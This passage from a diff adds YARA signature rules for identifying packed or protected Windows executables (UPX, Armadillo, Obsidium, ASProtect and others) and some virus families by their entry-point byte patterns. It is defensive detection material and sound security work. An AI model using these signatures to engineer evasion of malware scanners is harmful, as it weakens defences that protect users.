+		$a0 at pe.entry_point
+}
+	
+	
+rule AHPack01FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 54 ?? ?? 00 B8 48 ?? ?? 00 FF 10 68 B3 ?? ?? 00 50 B8 44 ?? ?? 00 FF 10 68 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SentinelSuperProAutomaticProtectionv640Safenet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 6A 01 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C9 3D B7 00 00 00 A1 ?? ?? ?? ?? 0F 94 C1 85 C0 89 0D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DxPack10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 8B FD 81 ED ?? ?? ?? ?? 2B B9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah103byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 2A 27 40 00 31 C0 40 83 F0 06 40 3D 40 1F 00 00 75 07 BE 6A 27 40 00 EB 02 EB EB 8B 85 9E 28 40 00 83 F8 01 75 17 31 C0 01 EE 3D 99 00 00 00 74 0C 8B 8D 86 28 40 00 30 0E 40 46 EB ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1258ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nPackv11150200BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? 00 E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PerlApp602ActiveState
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 2C EA 40 00 FF D3 83 C4 0C 85 C0 0F 85 CD 00 00 00 6A 09 57 68 20 EA 40 00 FF D3 83 C4 0C 85 C0 75 12 8D 47 09 50 FF 15 1C D1 40 00 59 A3 B8 07 41 00 EB 55 6A 08 57 68 14 EA 40 00 FF D3 83 C4 0C 85 C0 75 11 8D 47 08 50 FF 15 1C D1 40 00 59 89 44 24 10 EB 33 6A 09 57 68 08 EA 40 00 FF D3 83 C4 0C 85 C0 74 22 6A 08 57 68 FC E9 40 00 FF D3 83 C4 0C 85 C0 74 11 6A 0B 57 68 F0 E9 40 00 FF D3 83 C4 0C 85 C0 75 55 }
+	$a1 = { 68 9C E1 40 00 FF 15 A4 D0 40 00 85 C0 59 74 0F 50 FF 15 1C D1 40 00 85 C0 59 89 45 FC 75 62 6A 00 8D 45 F8 FF 75 0C F6 45 14 01 50 8D 45 14 50 E8 9B 01 00 00 83 C4 10 85 C0 0F 84 E9 00 00 00 8B 45 F8 83 C0 14 50 FF D6 85 C0 59 89 45 FC 75 0E FF 75 14 FF 15 78 D0 40 00 E9 C9 00 00 00 68 8C E1 40 00 FF 75 14 50 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule UPXProtectorv10x2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallEmbedded2501Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A8 1A 00 00 B9 6D 1A 00 00 BA 21 1B 00 00 BE 00 10 00 00 BF C0 53 00 00 BD F0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CodeVirtualizer1310OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C FC E8 00 00 00 00 5F 81 EF ?? ?? ?? ?? 8B C7 81 C7 ?? ?? ?? ?? 3B 47 2C 75 02 EB 2E 89 47 2C B9 A7 00 00 00 EB 05 01 44 8F ?? 49 0B C9 75 F7 83 7F 40 00 74 15 8B 77 40 03 F0 EB 09 8B 1E 03 D8 01 03 83 C6 04 83 3E 00 75 F2 8B 74 24 24 8B DE 03 F0 B9 01 00 00 00 33 C0 F0 0F B1 4F 30 75 F7 AC }
+
+condition:
+		$a0
+}
+	
+	
+rule VProtector13Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 60 8B B4 24 24 00 00 00 8B BC 24 28 00 00 00 FC C6 C2 80 33 DB A4 C6 C3 02 E8 A9 00 00 00 0F 83 F1 FF FF FF 33 C9 E8 9C 00 00 00 0F 83 2D 00 00 00 33 C0 E8 8F 00 00 00 0F 83 37 00 00 00 C6 C3 02 41 C6 C0 10 E8 7D 00 00 00 10 C0 0F 83 F3 FF FF FF }
+	$a1 = { E9 B9 16 00 00 55 8B EC 81 EC 74 04 00 00 57 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 FF FF C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Packman0001bubba
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 8D A8 ?? FE FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePackV11XV12XMethod1bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA BD ?? ?? ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEEncryptv40bJunkCode
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 ?? ?? 00 66 83 ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEQuake006forgat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 A5 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? ?? 00 5B ?? ?? 00 6E ?? ?? 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 ?? ?? 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Kryptonv02
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 0C 24 E9 0A 7C 01 ?? AD 42 40 BD BE 9D 7A 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePELockNT204FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorPacK150XCGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 83 A5 ?? ?? ?? ?? ?? F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 35 2E 00 83 7D 0C ?? 75 23 8B 45 08 A3 ?? ?? ?? ?? 6A 04 68 00 10 00 00 68 20 03 00 00 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? EB 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule D1S1Gv11BetaScrambledEXED1N
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 07 00 00 00 E8 1E 00 00 00 C3 90 58 89 C2 89 C2 25 00 F0 FF FF 50 83 C0 55 8D 00 FF 30 8D 40 04 FF 30 52 C3 8D 40 00 55 8B EC 83 C4 E8 53 56 57 8B 4D 10 8B 45 08 89 45 F8 8B 45 0C 89 45 F4 8D 41 61 8B 38 8D 41 65 8B 00 03 C7 89 45 FC 8D 41 69 8B 00 03 C7 8D 51 6D 8B 12 03 D7 83 C1 71 8B 09 03 CF 2B CA 72 0A 41 87 D1 80 31 FF 41 4A 75 F9 89 45 F0 EB 71 8B }
+
+condition:
+		$a0
+}
+	
+	
+rule ReversingLabsProtector074betaAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 00 41 00 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtect109gRiscosoftwareInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 F9 50 E8 01 00 00 00 7C 58 58 49 50 E8 01 00 00 00 7E 58 58 79 04 66 B9 B8 72 E8 01 00 00 00 7A 83 C4 04 85 C8 EB 01 EB C1 F8 BE 72 03 73 01 74 0F 81 01 00 00 00 F9 EB 01 75 F9 E8 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NorthStarPEShrinker13Liuxingping
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorV13CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild035GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 51 33 CB 86 C9 59 E8 9E FD FF FF 66 87 DB 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack020betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX20030XMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule WinUpackv039finalByDwingc2005h1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 39 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler12Bp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D8 53 56 57 33 C0 89 45 D8 89 45 DC 89 45 E0 89 45 E4 89 45 E8 B8 70 3A 40 00 E8 C4 EC FF FF 33 C0 55 68 5C 3F 40 00 64 FF 30 64 89 20 E8 C5 D7 FF FF E8 5C F5 FF FF B8 20 65 40 00 33 C9 BA 04 01 00 00 E8 D3 DB FF FF 68 04 01 00 00 68 20 65 40 00 6A 00 FF 15 10 55 40 00 BA 6C 3F 40 00 B8 14 55 40 00 E8 5A F4 FF FF 85 C0 0F 84 1B 04 00 00 BA 18 55 40 00 8B 0D 14 55 40 00 E8 16 D7 FF FF 8B 05 88 61 40 00 8B D0 B8 54 62 40 00 E8 D4 E3 FF FF B8 54 62 40 00 E8 F2 E2 FF FF 8B D0 B8 18 55 40 00 8B 0D 88 61 40 00 E8 E8 D6 FF FF FF 35 34 62 40 00 FF 35 30 62 40 00 FF 35 3C 62 40 00 FF 35 38 62 40 00 8D 55 E8 A1 88 61 40 00 E8 E3 F0 FF FF 8B 55 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upack010012betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmorV07Xhying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 55 56 81 C5 ?? ?? ?? ?? 55 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LauncherGeneratorv103
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 20 40 00 68 10 20 40 00 6A 00 6A 00 6A 20 6A 00 6A 00 6A 00 68 F0 22 40 00 6A 00 E8 93 00 00 00 85 C0 0F 84 7E 00 00 00 B8 00 00 00 00 3B 05 68 20 40 00 74 13 6A ?? 68 60 23 40 00 68 20 23 40 00 6A 00 E8 83 00 00 00 A1 58 20 40 00 3B 05 6C 20 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule yodasProtector102103AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NakedPacker10byBigBoote
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 FC 0F B6 05 34 ?? ?? ?? 85 C0 75 31 B8 50 ?? ?? ?? 2B 05 04 ?? ?? ?? A3 30 ?? ?? ?? A1 00 ?? ?? ?? 03 05 30 ?? ?? ?? A3 38 ?? ?? ?? E8 9A 00 00 00 A3 50 ?? ?? ?? C6 05 34 ?? ?? ?? 01 83 3D 50 ?? ?? ?? 00 75 07 61 FF 25 38 ?? ?? ?? 61 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 40 ?? ?? ?? C3 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 48 ?? ?? ?? C3 8B 4C 24 04 56 8B 74 24 10 57 85 F6 8B F9 74 0D 8B 54 24 10 8A 02 88 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule tElockv080
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 F9 11 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01YodasProtector102Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 90 90 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector11Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah102byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED DE 26 40 00 8B BD 05 28 40 00 8B 8D 0D 28 40 00 B8 25 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 09 28 40 00 31 C0 51 31 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 09 28 40 00 8B 85 11 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 25 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 01 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ActiveMARK5xTrymediaSystemsInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 20 2D 2D 4D 50 52 4D 4D 47 56 41 2D 2D 00 75 73 65 72 33 32 2E 64 6C 6C 00 4D 65 73 73 61 67 65 42 6F 78 41 00 54 68 69 73 20 61 70 70 6C 69 63 61 74 69 6F 6E 20 63 61 6E 6E 6F 74 20 72 75 6E 20 77 69 74 68 20 61 6E 20 61 63 74 69 76 65 20 64 65 62 75 67 }
+
+condition:
+		$a0
+}
+	
+	
+rule RCryptorv20HideEPVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 DC 20 ?? 00 F7 D1 83 F1 FF E8 00 00 00 00 F7 D1 83 F1 FF C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov172v173
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E8 C1 ?? ?? 68 F4 86 ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AsCryptv01SToRM2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 83 ?? ?? E2 }
+
+condition:
+		$a0
+}
+	
+	
+rule AsCryptv01SToRM3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 51 ?? ?? ?? 01 00 00 00 83 ?? ?? E2 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASProtectV2XDLLAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AsCryptv01SToRM4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 E2 }
+
+condition:
+		$a0
+}
+	
+	
+rule yzpack20UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 25 ?? ?? ?? ?? 61 87 CC 55 45 45 55 81 ED CA 00 00 00 55 A4 B3 02 FF 14 24 73 F8 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 1F B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3C AA EB DC FF 54 24 04 2B CB 75 0F FF 54 24 08 EB 27 AC D1 E8 74 30 13 C9 EB 1B 91 48 C1 E0 08 AC FF 54 24 08 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 99 BD ?? ?? ?? ?? FF 65 28 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PasswordprotectormySMT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5D 8B FD 81 ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 46 80 ?? ?? 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1258V133XObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ReflexiveArcadeWrapper
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 68 42 00 68 14 FA 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 F8 50 42 00 33 D2 8A D4 89 15 3C E8 42 00 8B C8 81 E1 FF 00 00 00 89 0D 38 E8 42 00 C1 E1 08 03 CA 89 0D 34 E8 42 00 C1 E8 10 A3 30 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTrojanTelefoon
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 1E E8 3B 01 BF CC 01 2E 03 3E CA 01 2E C7 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv030betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 30 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxACMEClonewarMutant
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC AD 3D FF FF 74 20 E6 42 8A C4 E6 42 E4 61 0C 03 E6 61 AD B9 40 1F E2 FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov2xxCopyMemII
+{
+      meta:
+		author="malware-lu"
+strings:
